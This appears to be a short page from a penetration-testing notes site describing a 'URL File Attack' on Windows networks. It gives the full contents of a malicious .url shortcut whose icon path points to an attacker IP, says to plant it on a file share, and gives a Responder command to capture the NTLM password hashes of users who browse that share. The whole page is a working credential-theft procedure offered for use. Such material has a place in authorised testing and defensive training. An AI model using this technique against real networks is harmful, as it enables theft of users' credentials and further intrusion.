URL File Attack

  • Requires a compromised user account or an open file share

Steps

  • Create a file containing the following

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\IP-ADDRESS\%USERNAME%.icon
IconIndex=1

  • IP-ADDRESS should be your attacker IP

  • Save this file to a network file share with the name "@something.url"

  • On your attacker machine start responder - sudo responder -I eth0

  • On the victim machine close all explorer windows and open a new one, then navigate to the file share where you saved the file

  • On the attacker machine you should see hashes pop up

URL FIle Attack Hashes
PreviousToken Impersonation using IncognitoNextPass Attacks

Last updated